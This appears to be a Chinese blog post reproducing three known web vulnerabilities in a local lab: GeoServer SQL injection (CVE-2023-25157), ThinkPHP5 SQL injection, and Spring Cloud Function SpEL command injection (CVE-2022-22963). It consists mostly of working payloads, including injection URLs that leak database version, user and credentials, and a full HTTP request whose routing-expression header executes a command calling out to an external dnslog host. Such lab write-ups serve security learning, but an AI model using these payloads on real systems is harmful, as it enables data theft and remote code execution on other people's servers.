geoserver SQL注入、Think PHP5 SQL注入、spring命令注入

文章目录

  • [一、geoserver SQL注入CVE-2023-25157](#一、geoserver SQL注入CVE-2023-25157)
  • [二、Think PHP5 SQL注入](#二、Think PHP5 SQL注入)
  • [三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)](#三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963))

一、geoserver SQL注入CVE-2023-25157

介绍GeoServer是一个开源的地理信息系统(GIS)服务器,用于发布、共享和管理地理空间数据和地图服务。它是一个基于Java的应用程序

访问127.0.0.1/geoserver

payload:http://127.0.0.1/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true

二、Think PHP5 SQL注入

think php是php开发框架

payload1:

bash 复制代码
http://127.0.0.1/index.php?ids[]=1&ids[]=2 # payload1,显示出用户名
http://127.0.0.1/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 # payload2,可以在调试页面找到数据库的账户和密码



thinkphp_gui_tools也是可以检测出该SQL注入漏洞的。

三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)

spring是一个java框架~

直接访问127.0.0.1:8080是一个错误页面。

直接发送下面的数据包:

php 复制代码
POST /functionRouter HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping sf4rrw.dnslog.cn")
Content-Type: text/plain
Content-Length: 8

test


相关推荐
CDN36016 分钟前
中小团队加速 + 防护方案:360CDN+SDK 游戏盾实测
运维·游戏·网络安全
向往着的青绿色2 小时前
备份是个好习惯 BugKuCTF题目题解
网络安全·php·安全威胁分析·ctf·安全架构·安全性测试·威胁分析
Codefengfeng3 小时前
2024年四川省第二届网信行业技能竞赛-数据安全赛项决赛WP
网络安全
汤愈韬5 小时前
BGP知识点解析
网络协议·网络安全·security
浮尘笔记9 小时前
PHP中常规通用接口验签加密规则设计
开发语言·后端·网络安全·php
xixixi777779 小时前
安全前置设计:在智能体、模型、网络中嵌入零信任、隐私计算、智能体防护,避免“先建设后补安全”
人工智能·安全·网络安全·ai·信息安全·零信任·智能体
吉吉6111 小时前
雷池waf绕过之前奏
网络安全
汤愈韬11 小时前
网络安全管理员三级认证考试疑问题目分析
网络安全
Palpitate_LL11 小时前
MIPS栈溢出:ROP构造与Shellocde注入
网络安全
一名优秀的码农12 小时前
vulhub系列-35-hacksudo ProximaCentauri(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析